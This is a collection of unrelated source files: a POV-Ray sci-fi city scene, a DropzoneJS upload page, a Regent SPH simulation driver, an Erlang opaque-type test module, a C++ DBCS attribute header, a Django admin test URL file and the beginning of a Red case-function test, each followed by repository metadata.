media {
emission 2*Intensity
density {
spherical
color_map {
[0 rgb 0]
[1 rgb <1,0.9,0.8>]
}
scale <1,0.4,1>
translate -y*0.1
}
}
media {
emission 1*Intensity
density {
pigment_pattern{
function {min(1,max(0,y))}
turbulence 0.1
lambda 4
}
color_map {
[0.0 rgb <1,.5,.05>]
[0.8 rgb 0]
}
scale 0.4*<1,1,1>
}
}
}
scale <0.2,3,0.2>*0.9
rotate z*90
scale <1,0.8,1>
}
#declare Flames=union{
object{Flame translate <0,-0.166471,0.3835>}
object{Flame translate <0,-0.166471,-0.3835>}
translate x*-1.6
}
#declare V_WorldBoundMin = <-2.367380, -0.440462, -0.988990>;
#declare V_WorldBoundMax = <2.089100, 1.630210, 0.989146>;
#debug "Car5a\n"
#include "car5_o.inc"
#declare Cars[1]=union{
object{ P_cube2_Chrome }
object{ P_cube2_Glass }
object{ P_cube2_Headlight }
object{ P_cube2_Mirror }
object{ P_cube2_ReactorIn }
object{ P_cube2_Rearlight }
object{ P_cube2_default }
object{ Flames }
translate y*0.2
scale 1.4
rotate -y*90
}
#end
// -----------------------------------------
// car 6 (speeder car with bulb canopy)
// -----------------------------------------
#if (Car6OK=1)
#declare V_WorldBoundMin = <-1.817420, -0.026592, -1.289770>;
#declare V_WorldBoundMax = <2.914590, 1.447330, 1.289770>;
#declare T_Reactor = texture{pigment{LightGreys[3]}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0,0.2*Ref}}}
#declare T_Paint = texture{
pigment{Reds[5]*0.45+Orange*0.45}
finish{
ambient 0 diffuse 1 specular 1 roughness 1/40 metallic brilliance 3
reflection{0,0.3*Ref fresnel on}
}
}
#declare T_Rlight = texture{pigment{Red*0.2}finish{ambient 0 diffuse 1}}
#declare T_Hlight = texture{pigment{White*0.5}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0.3*Ref,Ref}}}
#declare T_Glass = texture{pigment{rgbf <0.4,0.9,0.96,0.6>/2} finish{ambient 0 diffuse 0.1 specular 1 roughness 1/1000 reflection{0*Ref,0.9*Ref}}}
#declare T_Chrome = texture{pigment{rgb <1,0.9,0.8>*0.7} finish{ambient 0 diffuse 1 brilliance 5 metallic specular 1 roughness 1/200 reflection{0.1*Ref, 0.5*Ref}}}
#declare Intensity=3;
#declare Flame= difference{
sphere{0,1}
plane{y,0}
hollow
texture{
pigment{Clear}
finish{ambient 0 diffuse 0}
}
interior {
media {
emission 2*Intensity
density {
spherical
color_map {
[0 rgb 0]
[1 rgb <1,0.9,0.8>]
}
scale <1,0.4,1>
translate -y*0.1
}
}
media {
emission 1*Intensity
density {
pigment_pattern{
function {min(1,max(0,y))}
turbulence 0.1
lambda 4
}
color_map {
[0.0 rgb <1,.5,.05>]
[0.8 rgb 0]
}
scale 0.4*<1,1,1>
}
}
}
scale <0.2,3,0.2>*0.9
rotate z*90
translate <-1.1,0.25,0>
}
#debug "Car6a\n"
#include "car6_o.inc"
#declare Cars[3]=union{
object{ P_cube2_Chrome }
object{ P_cube2_Glass }
object{ P_cube2_Hlight }
object{ P_cube2_Paint interior{ior 10}}
object{ P_cube2_Reactor }
object{ P_cube2_Rlight }
object{ Flame }
scale 1.4
rotate -y*90
}
#end
// -----------------------------------------
// car 7 (classic car with keel)
// -----------------------------------------
#if (Car7OK=1)
#declare V_WorldBoundMin = <-1.824800, -0.207535, -1.012980>;
#declare V_WorldBoundMax = <2.266020, 1.866860, 1.012980>;
#declare T_Mirror = texture{pigment{Black}finish{ambient 0 diffuse 0 roughness 1/30 reflection 1}}
#declare T_Exhaust = texture{pigment{DarkGreys[8]}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0,0.2*Ref}}}
#declare T_Paint = texture{
pigment{LightGreys[8]}
finish{
ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0,0.5*Ref}
}
}
#declare T_Rlight = texture{pigment{Red*0.2}finish{ambient 0 diffuse 1}}
#declare T_Hlight = texture{pigment{White*0.5}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0.3*Ref,Ref}}}
#declare T_Glass = texture{pigment{rgbf <0.9,0.9,0.96,0.9>} finish{ambient 0 diffuse 0.1 specular 1 roughness 1/1000 reflection{0.1*Ref,0.5*Ref}}}
#declare T_Chrome = texture{pigment{rgb <1,0.9,0.8>*0.7} finish{ambient 0 diffuse 1 brilliance 5 metallic specular 1 roughness 1/200 reflection{0.1*Ref, 0.5*Ref}}}
#declare T_Slight = texture{pigment{Orange*0.2}finish{ambient 0 diffuse 1}}
#declare T_default = texture{T_Paint}
#declare Intensity=3;
#declare Flame= difference{
sphere{0,1}
plane{y,0}
hollow
texture{
pigment{Clear}
finish{ambient 0 diffuse 0}
}
interior {
media {
emission 2*Intensity
density {
spherical
color_map {
[0 rgb 0]
[1 rgb <1,0.9,0.8>]
}
scale <1,0.4,1>
translate -y*0.1
}
}
media {
emission 1*Intensity
density {
pigment_pattern{
function {min(1,max(0,y))}
turbulence 0.1
lambda 4
}
color_map {
[0.0 rgb <1,.5,.05>]
[0.8 rgb 0]
}
scale 0.4*<1,1,1>
}
}
}
scale <0.2,3,0.2>*0.8
rotate z*90
}
#declare Flames=union{
object{Flame translate <-1.25,0.48,-0.22>}
object{Flame translate <-1.25,0.48,0.22>}
}
#debug "Car7a\n"
#include "car7_o.inc"
#declare Cars[4]=union{
object{ P_cube2_Chrome }
object{ P_cube2_Exhaust }
object{ P_cube2_Glass }
object{ P_cube2_Hlight }
object{ P_cube2_Mirror }
object{ P_cube2_Paint }
object{ P_cube2_Rlight }
object{ P_cube2_Slight }
object{ P_cube2_default }
object{ Flames }
scale 1.6
rotate -y*90
}
#end
// -----------------------------------------
// truck 1 (boxy one)
// -----------------------------------------
#if (Truck1OK=1)
#declare V_WorldBoundMin = <-5.008890, -1.144870, -1.146160>;
#declare V_WorldBoundMax = <2.620000, 1.122500, 1.146160>;
#declare T_Paint = texture{pigment{average pigment_map{[1 P_Metal01 scale 1/4][2 Blues[6]]}}finish{ambient 0 diffuse 1 metallic brilliance 1 specular 0.4 roughness 1/30}}
#declare T_Rlight = texture{pigment{Red*0.2}finish{ambient 0 diffuse 1}}
#declare T_Hlight = texture{pigment{White*0.5}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0.3*Ref,Ref}}}
#declare T_Glass = texture{pigment{rgbf <0.9,0.9,0.96,0.9>} finish{ambient 0 diffuse 0.1 specular 1 roughness 1/1000 reflection{0.1*Ref,0.5*Ref}}}
#declare T_Chrome = texture{pigment{rgb <1,0.9,0.8>*0.7} finish{ambient 0 diffuse 1 brilliance 5 metallic specular 1 roughness 1/200 reflection{0.4*Ref, 0.99*Ref}}}
#declare T_Metal = texture{pigment{average pigment_map{[1 P_Metal01 scale 1/10][1 DarkGreys[2]]}}finish{ambient 0 diffuse 0.6 metallic brilliance 4 specular 0.4 roughness 1/30}}
#declare Intensity=3;
#declare Flame= difference{
sphere{0,1}
plane{y,0}
hollow
texture{
pigment{Clear}
finish{ambient 0 diffuse 0}
}
interior {
media {
emission 2*Intensity
density {
spherical
color_map {
[0 rgb 0]
[1 rgb <1,0.9,0.8>]
}
scale <1,0.4,1>
translate -y*0.1
}
}
media {
emission 1*Intensity
density {
pigment_pattern{
function {min(1,max(0,y))}
turbulence 0.1
lambda 4
}
color_map {
[0.0 rgb <1,.5,.05>]
[0.8 rgb 0]
}
scale 0.4*<1,1,1>
}
}
}
scale <0.25,4,0.25>
rotate z*90
}
#declare Flames=union{
object{Flame translate <0,0.46,0.41>}
object{Flame translate <0,0.46,-0.41>}
object{Flame translate <0,-0.35,0.41>}
object{Flame translate <0,-0.35,-0.41>}
translate -x*3.8
}
#debug "Truck 1a\n"
#include "truck1_o.inc"
#declare Cars[5]=union{
object{ P_cube1_Chrome }
object{ P_cube1_Glass }
object{ P_cube1_Hlight }
object{ P_cube1_Metal }
object{ P_cube1_Paint }
object{ Flames }
translate y*1.1+x
scale 1.7
rotate -y*90
}
#end
// -----------------------------------------
// truck 2 (with side reactors)
// -----------------------------------------
#if (Truck2OK=1)
#declare V_WorldBoundMin = <-1.975230, -0.354250, -3.138580>;
#declare V_WorldBoundMax = <1.975230, 1.482000, 3.133740>;
#declare T_Paint = texture{pigment{Greens[1]}finish{ambient 0 diffuse 1 metallic brilliance 1 specular 0.4 roughness 1/30 reflection{0.1*Ref,0.5*Ref}}}
#declare T_Paint2 = texture{pigment{image_map{jpeg "csign33" interpolate 2} scale <-1.3,1,1>/16}finish{ambient 0 diffuse 0.6 metallic brilliance 1 specular 0.4 roughness 1/30}}
#declare T_Rlight = texture{pigment{Red*0.2}finish{ambient 0 diffuse 1}}
#declare T_Hlight = texture{pigment{White*0.5}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0.3*Ref,Ref}}}
#declare T_Glass = texture{pigment{rgbf <0.7,0.9,0.96,0.9>} finish{ambient 0 diffuse 0.1 specular 1 roughness 1/1000 reflection{0.1*Ref,0.5*Ref}}}
#declare T_Chrome = texture{T_Paint} //texture{pigment{rgb <1,0.9,0.8>*0.7} finish{ambient 0 diffuse 1 brilliance 2 metallic specular 1 roughness 1/200 reflection{0*Ref, 0.2*Ref}}}
#declare T_Reactor = texture{pigment{DarkGreys[2]}finish{ambient 0 diffuse 1 metallic brilliance 1 specular 0.4 roughness 1/30}}
#declare T_default=texture{T_Reactor}
#declare Intensity=3;
#declare Flame= difference{
sphere{0,1}
plane{y,0}
hollow
texture{
pigment{Clear}
finish{ambient 0 diffuse 0}
}
interior {
media {
emission 2*Intensity
density {
spherical
color_map {
[0 rgb 0]
[1 rgb <1,0.9,0.8>]
}
scale <1,0.4,1>
translate -y*0.1
}
}
media {
emission 1*Intensity
density {
pigment_pattern{
function {min(1,max(0,y))}
turbulence 0.1
lambda 4
}
color_map {
[0.0 rgb <1,.5,.05>]
[0.8 rgb 0]
}
scale 0.4*<1,1,1>
}
}
}
scale <0.2,3,0.2>
rotate -x*90
}
#declare Flames=union{
object{Flame translate <1.69,-0.1025,0>}
object{Flame translate <-1.69,-0.1025,0>}
translate -z*2.5
}
#debug "Truck 2a\n"
#include "truck2_o.inc"
#declare Cars[6]=union{
object{ P_cube2_Chrome }
object{ P_cube2_Glass }
object{ P_cube2_Hlight }
object{ P_cube2_Paint }
object{ P_cube2_Paint2 }
object{ P_cube2_Reactor }
object{ P_cube2_Rlight }
object{ P_cube2_default }
object{ Flames }
scale 1.7
}
#end
// -----------------------------------------
// Bus
// -----------------------------------------
#if (BusOK=1)
#declare F_Paint=finish{
ambient 0
diffuse 0.7
specular 1
roughness 1/1000
reflection {0,0.4*Ref}
}
#declare F_BrushedMetal=finish{
ambient 0
diffuse 0.6
metallic
brilliance 1
specular 0.1
roughness 1/20
reflection {0,0.1*Ref}
}
#declare T_Paint = texture{// body paint
pigment_pattern{
gradient z
rotate x*45
scale 10
translate z*8
}
texture_map{
[0.95
gradient y
texture_map{
[0.6 pigment{White}finish{F_BrushedMetal}]
[0.6 pigment{White*0.1}finish{F_Paint}]
[0.7 pigment{White*0.1}finish{F_Paint}]
[0.7 pigment{rgb <1,0.3,0.2>}finish{F_Paint}]
[0.8 pigment{rgb <1,0.3,0.2>}finish{F_Paint}]
[0.8 pigment{rgb <247,197,27>/255}finish{F_Paint}]
}
]
[0.95 pigment{SkyBlue}finish{F_BrushedMetal}]
}
scale 0.5
}
// use the transparent glass if necessary (takes longer to render)
// for instance when using the version with interior lighting
#declare T_Glass = texture{
// pigment{rgbf <0.6,0.9,0.96,0.6>} // for transparent glass
pigment{rgb <0.6,0.9,0.96>}
finish{ambient 0 diffuse 0.1 specular 1 roughness 1/1000
reflection{0.1*Ref,0.5*Ref}
}
}
#declare T_Metal = texture{pigment{DarkGreys[2]}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30}}
#declare Intensity=3;
#declare Flame= difference{
sphere{0,1}
plane{y,0}
hollow
texture{
pigment{Clear}
finish{ambient 0 diffuse 0}
}
interior {
media {
emission 2*Intensity
density {
spherical
color_map {
[0 rgb 0]
[1 rgb <1,0.9,0.8>]
}
scale <1,0.4,1>
translate -y*0.1
}
}
media {
emission 1*Intensity
density {
pigment_pattern{
function {min(1,max(0,y))}
turbulence 0.1
lambda 4
}
color_map {
[0.0 rgb <1,.5,.05>]
[0.8 rgb 0]
}
scale 0.4*<1,1,1>
}
}
}
scale <0.25,4,0.25>*0.5
rotate -x*90
}
#declare V_WorldBoundMin = <-2.088460, -0.543148, -5.648700>;
#declare V_WorldBoundMax = <2.088460, 2.074820, 0.168207>;
#debug "bus wagon\n"
#include "bus_o.inc"
#declare Bus_Wagon=union{
object{ P_cube1_Glass }
object{ P_cube1_Metal }
object{ P_cube1_Paint }
}
#declare V_WorldBoundMin = <-0.693440, 0.165479, -0.002704>;
#declare V_WorldBoundMax = <0.693422, 1.337700, 2.596930>;
#debug "bus head\n"
#include "bushead_o.inc"
#declare Bus_Head=union{
object{ P_cube1_cut4_Glass }
object{ P_cube1_cut4_Metal }
object{ P_cube1_cut4_Paint }
object{Flame translate <0,-0.13,1.1>}
}
#declare V_WorldBoundMin = <-0.608794, 0.079604, -1.761380>;
#declare V_WorldBoundMax = <0.608890, 1.330880, 0.168207>;
#debug "bus tail\n"
#include "bustail_o.inc"
#declare Bus_Tail=union{
object{ P_cube1_cut2_Metal }
object{ P_cube1_cut2_Paint }
}
#declare BusStraight=union{
object{Bus_Head}
object{Bus_Wagon}
object{Bus_Wagon translate -z*5.68}
object{Bus_Wagon translate -z*5.68*2}
object{Bus_Wagon translate -z*5.68*3}
object{Bus_Wagon translate -z*5.68*4}
object{Bus_Wagon translate -z*5.68*5}
object{Bus_Tail translate -z*5.68*6}
scale 2.5
}
// the following bus is not used in the image
// it's the same as above, but with only 3 wagons and it's turning
#declare Bus_Angle=-15;
#declare BusTurn=union{
object{Bus_Head}
union{
object{Bus_Wagon}
union{
object{Bus_Wagon}
union{
object{Bus_Wagon}
object{
Bus_Tail
rotate y*Bus_Angle
translate -z*5.68
}
rotate y*Bus_Angle
translate -z*5.68
}
rotate y*Bus_Angle
translate -z*5.68
}
rotate y*Bus_Angle
}
scale 2.5
}
// this bus is not used in the image
// same bus as above but with interior lighting
//
#declare BusLight=light_group{
object{Bus_Wagon}
light_source{<0,1,-2.5> C_BusLight*3 media_interaction off}
global_lights on
}
#declare BusStraightLight=union{
object{Bus_Head}
object{BusLight}
object{BusLight translate -z*5.68}
object{BusLight translate -z*5.68*2}
object{BusLight translate -z*5.68*3}
object{BusLight translate -z*5.68*4}
object{BusLight translate -z*5.68*5}
object{BusLight translate -z*5.68*6}
scale 2.5
}
#declare BusTurnLight=union{
object{Bus_Head}
union{
object{BusLight}
union{
object{BusLight}
union{
object{BusLight}
object{
Bus_Tail
rotate y*Bus_Angle
translate -z*5.68
}
rotate y*Bus_Angle
translate -z*5.68
}
rotate y*Bus_Angle
translate -z*5.68
}
rotate y*Bus_Angle
}
scale 2.5
}
#else
#declare BusStraight=box{<-5,0,-5.6*2.5*4>,<5,5,0> texture{pigment{Cyan}}}
#declare BusTurn=object{BusStraight}
#declare BusStraightLight=object{BusStraight}
#declare BusTurnLight=object{BusStraight}
#end
// -----------------------------------------
// Car placement
// -----------------------------------------
#if (CarsOK=1)
#macro RandZ()
<0.5-rand(rd),0.5-rand(rd),(0.5-rand(rd))*2>*20
#end
#macro RandX()
<(0.5-rand(rd))*2,(0.5-rand(rd))*8,(0.5-rand(rd))*2>*10
#end
#declare rd=seed(4610);
#declare Car= box{<-0.8,0,-2>,<0.8,1.6,2>}
// -----------------------------------------
// Foreground speeder
// -----------------------------------------
object{Cars[3] scale 1.5 rotate y*90 rotate x*-30 translate <384,202,-285> no_shadow}
// -----------------------------------------
// Car lines
// -----------------------------------------
#declare i=-200;
// lines extend on the x axis
union{
#while (i < 400)
#declare j=100;
#while (j<800)
object{Cars[int(nCars*rand(rd))] scale 2 rotate -y*90 rotate z*(0.5-rand(rd))*5 translate <i,j,-50>+RandX() no_shadow}
object{Cars[int(nCars*rand(rd))] scale 2 rotate y*90 rotate z*(0.5-rand(rd))*5 translate <i,j,-100>+RandX() no_shadow}
object{Cars[int(nCars*rand(rd))] scale 2 rotate -y*90 rotate z*(0.5-rand(rd))*5 translate <i,j,-150>+RandX() no_shadow}
object{Cars[int(nCars*rand(rd))] scale 2 rotate y*90 rotate z*(0.5-rand(rd))*5 translate <i,j,-200>+RandX() no_shadow}
object{Cars[int(nCars*rand(rd))] scale 2 rotate -y*90 rotate z*(0.5-rand(rd))*5 translate <i,j,-250>+RandX() no_shadow}
#declare j=j+100;
#end
#declare i=i+100;
#end
}
#end
// -----------------------------------------
// Placement bus
// -----------------------------------------
object{BusStraight scale 1.5 rotate y*180 translate <150,155,-250>}
object{BusStraight scale 1.5 rotate y*90 translate <320,265,-223>}
// -----------------------------------------
// Placement buildings
// -----------------------------------------
#if (BuildingsOK=1)
object{Build5 scale 1.5 scale <1,1,1> rotate y*0 translate -z*230-y*390+x*50}
object{Build7 rotate y*90 scale 1.4 translate -z*270-x*200+y*150}
object{Build3 scale 1.4 scale <4,1,-1> rotate y*90 translate -x*300+z*100-y*100}
object{Build5 scale 1.3 scale <4,1,1> rotate -y*90 translate -x*300-z*200-y*100}
object{Build5 scale 1.6 rotate y*90 translate -x*230-z*240-y*100}
object{Build4 scale 1.4 rotate y*90 translate -x*220-z*100}
object{Build4 scale 1.2 scale <-1,1,1> rotate y*0 translate -x*200-z*150-y*60}
object{Build3 scale 1.2 rotate y*-90 translate -x*180-z*100}
object{Build7 rotate -y*90 scale 1.4 translate -x*70+y*100}
object{Build7 scale 1.4} // main
object{Build7 rotate y*90 scale 1.4 translate x*70+y*50}
object{Build7 rotate -y*90 scale 1.4 translate x*100+y*50+z*250}
object{Build5 scale 1.4 translate x*140}
object{Build6 scale 1.6 translate x*230-y*100}
object{Build4 scale 1.4 rotate -y*180 translate x*260+z*100}
// bridge
object{Build3 scale 1.4 rotate y*0 scale <0.4,3,0.1> rotate x*90 rotate y*0 translate -x*150-z*225+y*155}
#end
// -----------------------------------------
// Ground plane
// -----------------------------------------
plane {y,-300 texture{pigment{P_Concrete03} finish{ambient 0 diffuse 0.1}}}
| POV-Ray SDL | 5 | SDRausty/TermuxPovray | scifi/scifi_demo.pov | [
"Apache-2.0"
] |
<html>
<head>
<title>DropzoneJS Uploader</title>
<!-- 1 -->
<link href="/public/css/dropzone.css" type="text/css" rel="stylesheet" />
<!-- 2 -->
<script src="/public/js/dropzone.js"></script>
<!-- 4 -->
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
<!-- 5 -->
<script>
Dropzone.options.myDropzone = {
paramName: "file", // The name that will be used to transfer the file
init: function () {
thisDropzone = this;
// 6
$.get('/uploads', function (data) {
if (data == null) {
return;
}
// 7
$.each(data, function (key, value) {
var mockFile = { name: value.name, size: value.size };
thisDropzone.emit("addedfile", mockFile);
thisDropzone.options.thumbnail.call(thisDropzone, mockFile, '/public/uploads/thumbnail_' + value.name);
// thisDropzone.createThumbnailFromUrl(mockFile, '/public/uploads/' + value.name); <- doesn't work...
// Make sure that there is no progress bar, etc...
thisDropzone.emit("complete", mockFile);
});
});
}
};
</script>
</head>
<body>
<!-- 3 -->
<form action="/upload" method="POST" class="dropzone" id="my-dropzone">
<div class="fallback">
<input name="file" type="file" multiple />
<input type="submit" value="Upload" />
</div>
</form>
</body>
</html> | HTML | 4 | tamsanh/examples | tutorial/dropzonejs/src/views/upload.html | [
"MIT"
] |
-------------------------------------------------------------
--Copyright 2020 Science and Technologies Facilities Council
--Licensed under the MIT License
--Author Aidan Chalk, STFC Hartree Centre
import "regent"
require("defaults")
require("src/interactions/MinimalSPH/interactions")
require("src/interactions/MinimalSPH/tasks")
require("src/interactions/MinimalSPH/hdf5_io")
require("src/interactions/MinimalSPH/timestep")
neighbour_init = require("src/neighbour_search/cell_pair_tradequeues/neighbour_init")
require("src/neighbour_search/cell_pair_tradequeues/neighbour_search")
local variables = require("src/interactions/MinimalSPH/variables")
local format = require("std/format")
local c = regentlib.c
local density_task = create_asymmetric_pairwise_runner( nonsym_density_kernel, variables.config, neighbour_init.cell_partition )
local force_task = create_symmetric_pairwise_runner( force_kernel, variables.config, neighbour_init.cell_partition )
local kick2_task = run_per_particle_task( kick2_kernel, variables.config, neighbour_init.cell_partition )
local kick1_task = run_per_particle_task( kick1_kernel, variables.config, neighbour_init.cell_partition )
local drift_task = run_per_particle_task( drift_kernel, variables.config, neighbour_init.cell_partition )
local reset_density_task = run_per_particle_task( reset_density, variables.config, neighbour_init.cell_partition )
local reset_force_task = run_per_particle_task( reset_acceleration, variables.config, neighbour_init.cell_partition )
local initial_density_reset = run_per_particle_task( reset_density, variables.config, neighbour_init.cell_partition )
local initial_force_reset = run_per_particle_task( reset_density, variables.config, neighbour_init.cell_partition )
local initial_density_task = create_asymmetric_pairwise_runner( nonsym_density_kernel, variables.config, neighbour_init.cell_partition )
local initial_timestep_task = run_per_particle_task( kick1_kernel, variables.config, neighbour_init.cell_partition )
local fname = os.getenv("SODSHOCK_INPUT") or "/home/aidan/swiftsim/examples/HydroTests/SodShock_3D/sodShock.hdf5"
print(fname)
__forbid(__inline)
task say_hello(time : float)
format.println("HELLO TIME {}", time)
end
task get_time() : double
return c.legion_get_current_time_in_micros()
end
task main()
--[initialisation("/home/aidan/swiftsim/examples/HydroTests/SodShock_3D/sodShock.hdf5", variables.particle_array, variables.space)]
var filename = fname
var count = read_particle_count(filename)
format.println("Initialising SPH from {} with {} hydro particles", filename, count)
var particles_space = ispace(int1d, count)
var [variables.particle_array] = region(particles_space, part)
var [variables.config] = region(ispace(int1d, 1), config_type)
fill([variables.config].{space.dim_x, space.dim_y, space.dim_z, space.timestep}, 0.0)
read_hdf5_snapshot(filename, count, [variables.particle_array], [variables.config])
format.println("{} {} {}", [variables.config][0].space.dim_x, [variables.config][0].space.dim_y, [variables.config][0].space.dim_z);
--Make 5x5x5 cells for now (chosen arbitrarily). NB This wouldn't not be sensible for optimised version, but the neighbour search will
--be involved in cell size choices for real cases
[neighbour_init.initialise(variables)];
[neighbour_init.update_cells(variables)];
--Initialisation
[initial_density_reset];
-- [run_per_particle_task( reset_density, variables.config, variables.cell_space )];
[initial_force_reset];
--Do the zero timestep to setup the IC
variables.config[0].space.timestep = 0.00
[initial_density_task];
update_cutoffs_launcher(neighbour_init.padded_particle_array, neighbour_init.cell_partition, variables.config);
[initial_timestep_task];
variables.config[0].space.timestep = compute_timestep_launcher(neighbour_init.padded_particle_array, neighbour_init.cell_partition, variables.config)
var time : double = 0.0
var endtime : double = 0.02
var step : int = 0
c.legion_runtime_issue_execution_fence(__runtime(), __context())
var start_time = get_time()
format.println("timestep computed is {}", variables.config[0].space.timestep)
c.legion_runtime_issue_execution_fence(__runtime(), __context())
-- __delete(variables.cell_space)
while time < endtime do
[drift_task];
-- [neighbour_init.update_cells(variables)];
[reset_density_task];
[density_task];
update_cutoffs_launcher(neighbour_init.padded_particle_array, neighbour_init.cell_partition, variables.config);
[reset_force_task];
[force_task];
--2nd kick
[kick2_task];
-- timestep_task([variables.particle_array], cell_partition, [variables.space])
c.legion_runtime_issue_execution_fence(__runtime(), __context());
say_hello(time)
time = time + variables.config[0].space.timestep
variables.config[0].space.timestep = compute_timestep_launcher(neighbour_init.padded_particle_array, neighbour_init.cell_partition, variables.config)
if(endtime - time < variables.config[0].space.timestep) then
variables.config[0].space.timestep = endtime - time
end
--first kick
[kick1_task];
format.println("Step {}: timestep is {}",step, variables.config[0].space.timestep)
step = step + 1
end
c.legion_runtime_issue_execution_fence(__runtime(), __context())
var end_time = get_time()
format.println("Computation took {} seconds.", (end_time - start_time)/1000000.0)
write_hdf5_snapshot("output.hdf5", neighbour_init.padded_particle_array, variables.config)
end
regentlib.start(main)
| Rouge | 5 | stfc/RegentParticleDSL | src/interactions/MinimalSPH/program.rg | [
"MIT"
] |
-module(para2_adt).
%% More parameterized opaque types
-export_type([c1/0, c2/0]).
-export_type([ct1/0, ct2/0]).
-export_type([circ/1, circ/2]).
-export_type([un/2]).
-export([c1/0, c2/0, ct1/0, ct2/0, circ1/0, circ2/0, u1/0, u2/0]).
-opaque c1() :: c2().
-opaque c2() :: c1().
-spec c1() -> c1().
c1() ->
a.
-spec c2() -> c2().
c2() ->
a.
-type ct1() :: ct2().
-type ct2() :: ct1().
-spec ct1() -> ct1().
ct1() ->
a.
-spec ct2() -> ct2().
ct2() ->
b.
-opaque circ(A) :: circ(A, A).
-opaque circ(A, B) :: circ({A, B}).
-spec circ1() -> circ(integer()).
circ1() ->
3.
-spec circ2() -> circ(integer(), integer()).
circ2() ->
{3, 3}.
-opaque un(A, B) :: A | B.
-spec u1() -> un(integer(), atom()).
u1() ->
3.
-spec u2() -> un(atom(), integer()).
u2() ->
3.
| Erlang | 4 | jjhoo/otp | lib/dialyzer/test/opaque_SUITE_data/src/para/para2_adt.erl | [
"Apache-2.0"
] |
"""
Test URLs for auth admins.
"""
from django.contrib import admin
from django.contrib.auth.admin import GroupAdmin, UserAdmin
from django.contrib.auth.models import Group, User
from django.contrib.auth.urls import urlpatterns
from django.urls import path
# Create a silo'd admin site for just the user/group admins.
site = admin.AdminSite(name='auth_test_admin')
site.register(User, UserAdmin)
site.register(Group, GroupAdmin)
urlpatterns += [
path('admin/', site.urls),
]
| Python | 4 | ni-ning/django | tests/auth_tests/urls_admin.py | [
"CNRI-Python-GPL-Compatible",
"BSD-3-Clause"
] |
/*++
Copyright (c) Microsoft Corporation
Licensed under the MIT license.
Module Name:
- DbcsAttribute.hpp
Abstract:
- helper class for storing double byte character set information about a cell in the output buffer.
Author(s):
- Austin Diviness (AustDi) 26-Jan-2018
Revision History:
--*/
#pragma once
class DbcsAttribute final
{
public:
enum class Attribute : BYTE
{
Single = 0x00,
Leading = 0x01,
Trailing = 0x02
};
DbcsAttribute() noexcept :
_attribute{ Attribute::Single },
_glyphStored{ false }
{
}
DbcsAttribute(const Attribute attribute) noexcept :
_attribute{ attribute },
_glyphStored{ false }
{
}
constexpr bool IsSingle() const noexcept
{
return _attribute == Attribute::Single;
}
constexpr bool IsLeading() const noexcept
{
return _attribute == Attribute::Leading;
}
constexpr bool IsTrailing() const noexcept
{
return _attribute == Attribute::Trailing;
}
constexpr bool IsDbcs() const noexcept
{
return IsLeading() || IsTrailing();
}
constexpr bool IsGlyphStored() const noexcept
{
return _glyphStored;
}
void SetGlyphStored(const bool stored) noexcept
{
_glyphStored = stored;
}
void SetSingle() noexcept
{
_attribute = Attribute::Single;
}
void SetLeading() noexcept
{
_attribute = Attribute::Leading;
}
void SetTrailing() noexcept
{
_attribute = Attribute::Trailing;
}
void Reset() noexcept
{
SetSingle();
SetGlyphStored(false);
}
WORD GeneratePublicApiAttributeFormat() const noexcept
{
WORD publicAttribute = 0;
if (IsLeading())
{
WI_SetFlag(publicAttribute, COMMON_LVB_LEADING_BYTE);
}
if (IsTrailing())
{
WI_SetFlag(publicAttribute, COMMON_LVB_TRAILING_BYTE);
}
return publicAttribute;
}
static DbcsAttribute FromPublicApiAttributeFormat(WORD publicAttribute)
{
// it's not valid to be both a leading and trailing byte
if (WI_AreAllFlagsSet(publicAttribute, COMMON_LVB_LEADING_BYTE | COMMON_LVB_TRAILING_BYTE))
{
THROW_HR(E_INVALIDARG);
}
DbcsAttribute attr;
if (WI_IsFlagSet(publicAttribute, COMMON_LVB_LEADING_BYTE))
{
attr.SetLeading();
}
else if (WI_IsFlagSet(publicAttribute, COMMON_LVB_TRAILING_BYTE))
{
attr.SetTrailing();
}
return attr;
}
friend constexpr bool operator==(const DbcsAttribute& a, const DbcsAttribute& b) noexcept;
private:
Attribute _attribute : 2;
bool _glyphStored : 1;
#ifdef UNIT_TESTING
friend class TextBufferTests;
#endif
};
constexpr bool operator==(const DbcsAttribute& a, const DbcsAttribute& b) noexcept
{
return a._attribute == b._attribute;
}
static_assert(sizeof(DbcsAttribute) == sizeof(BYTE), "DbcsAttribute should be one byte big. if this changes then it needs "
"either an implicit conversion to a BYTE or an update to all places "
"that assume it's a byte big");
| C++ | 5 | hessedoneen/terminal | src/buffer/out/DbcsAttribute.hpp | [
"MIT"
] |
Red [
Title: "Red case function test script"
Author: "Nenad Rakocevic & Peter W A Wood"
File: %case-test.red
Tabs: 4
Rights: "Copyright (C) 2011-2015, Red Foundation. All rights reserved."
License: "BSD-3 - https://github.com/red/red/blob/origin/BSD-3-License.txt"
]
#include %../../../quick-test/quick-test.red
~~~start-file~~~ "case"
===start-group=== "case basics"
--test-- "case-basic-1"
ci: 0
cia: 1
case [true [0]]
--assert cia = 1
--test-- "case-basic-2"
ci: 1
cia: 2
case [ci = 1 [cia: 2]]
--assert cia = 2
--test-- "case-basic-3"
ci: 1
cia: 2
case [true [cia: 3]]
--assert cia = 3
--test-- "case-basic-4"
ci: 0
cia: 2
case [ci <> 0 [cia: 0] true [cia: 3]]
--assert cia = 3
--test-- "case-basic-5"
ci: 99
cia: 2
case [ci = 1 [cia: 2] true [cia: 3]]
--assert cia = 3
--test-- "case-basic-6"
ci: 0
cia: 1
cia: case [true [2]]
--assert cia = 2
--test-- "case-basic-7"
ci: 0
cia: 2
cia: case [ci <> 0 [0] true [3]]
--assert cia = 3
--test-- "case-basic-8"
ci: 1
cia: 2
cia: case [ci = 1 [3]]
--assert cia = 3
--test-- "case-basic-9"
ci: 1
cia: 2
case [ci = 1 [case [ci <> 0 [cia: 3] true [cia: 4]]]]
--assert cia = 3
--test-- "case-basic-10"
